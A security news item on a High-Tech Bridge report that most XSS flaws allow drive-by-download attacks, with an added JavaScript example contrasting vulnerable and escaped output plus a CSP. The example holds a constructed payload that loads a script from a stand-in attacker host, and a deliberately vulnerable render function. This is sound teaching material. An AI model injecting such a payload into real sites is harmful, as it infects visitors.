XSS vulnerabilities open the door to drive-by downloads
Cross-site scripting (XSS) vulnerabilities let an attacker inject script into a page served by a trusted site. That script then runs in the visitor's browser with the site's own origin, and one thing it can do is infect the visitor's computer.
Security company High-Tech Bridge has released a report revealing that 95 percent of XSS vulnerabilities can be used to perform sophisticated drive-by-download attacks, which infect users who open harmless-looking URLs on sites they trust. More worrying, 90 percent of the vulnerabilities can be exploited in such a way that even advanced users and IT professionals won't suspect anything. The structure and architecture of more than 70 percent of web applications allows the creation of a sophisticated XSS exploit that performs several fully automated actions, ultimately giving the attacker full administrative access. That access can then be used to compromise the entire website and even the web server.
To protect against this type of attack, companies are advised to make clear to their web developers that a single XSS vulnerability can lead to the compromise of the entire company. Developers and server administrators need to follow security best practices, which will resolve the majority of potential problems.
It is also important to make sure that the IT team has a clear inventory of web resources, and that no abandoned or test web projects are reachable from the outside. Regular web penetration testing by an independent company is recommended too.
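The report's point, and the "best practices" the advice above refers to, come down to one mistake: user-controlled input written into a page as live markup. The following is an added example, not code from the article or from High-Tech Bridge. It assumes a hypothetical search page that echoes a `q` parameter back into its HTML, shows the vulnerable rendering beside an output-encoded one, and uses a constructed payload shaped like a drive-by loader (the hostname is illustrative).

```javascript
// Added example (not from the article or High-Tech Bridge): a reflected-XSS
// sink in a request handler, beside its hardened form.
// Assumed: a page that echoes a "q" search parameter back into its HTML.

// Minimal HTML escaping for element-content and quoted-attribute contexts.
// These five characters are the ones that let input break out of text
// content or out of a double- or single-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the parameter is concatenated straight into the markup.
// A payload carrying a <script src=...> element is returned as live script
// and executes in the victim's browser under the site's own origin.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: the same value is HTML-encoded before it enters the document,
// so the browser displays the payload as text instead of executing it.
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Attribute context: the value must be quoted AND escaped. An unquoted
// attribute could still be broken out of with a space, and an unescaped
// quote would end the attribute and let the input add an event handler.
function renderPrefillHardened(query) {
  return `<input name="q" value="${escapeHtml(query)}">`;
}

// Crude check used only to show the difference between the two renderings:
// does the output still contain a script element that a browser would run?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth: a CSP that forbids inline script and limits script
// sources to the site itself blocks an injected remote loader even if an
// escaping bug slips through elsewhere in the application.
function securityHeaders() {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
  };
}

// Constructed payload in the shape of a drive-by loader (illustrative host).
const PAYLOAD = '<script src="//attacker.example/dropper.js"></script>';

console.log(renderSearchVulnerable(PAYLOAD)); // script element survives
console.log(renderSearchHardened(PAYLOAD));   // shown as &lt;script ...&gt; text
console.log(securityHeaders());
```

Escaping is context-specific: the function above is correct for element content and quoted attributes, but input placed inside a `<script>` block, a URL, or a CSS value needs the encoding rules of that context, which is why a templating engine with contextual auto-escaping is the usual recommendation rather than hand-written `replace` chains.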
Ilia Kolochenko, High-Tech Bridge's CEO, says, "SQL injection vulnerabilities are becoming more and more rare, as well as other high and critical risk vulnerabilities. They are complex to detect and quite often require a lot of time to exploit. At the same time almost nobody cares about 'medium-risk' XSS vulnerabilities, leaving their websites vulnerable. Obviously, hackers benefit from such negligence and use XSS vulnerabilities to achieve their goals. If you close your door, don't forget to close your windows -- otherwise the entire security is at risk."
There’s much more information on how XSS can leave users open to hacking on the High-Tech Bridge blog.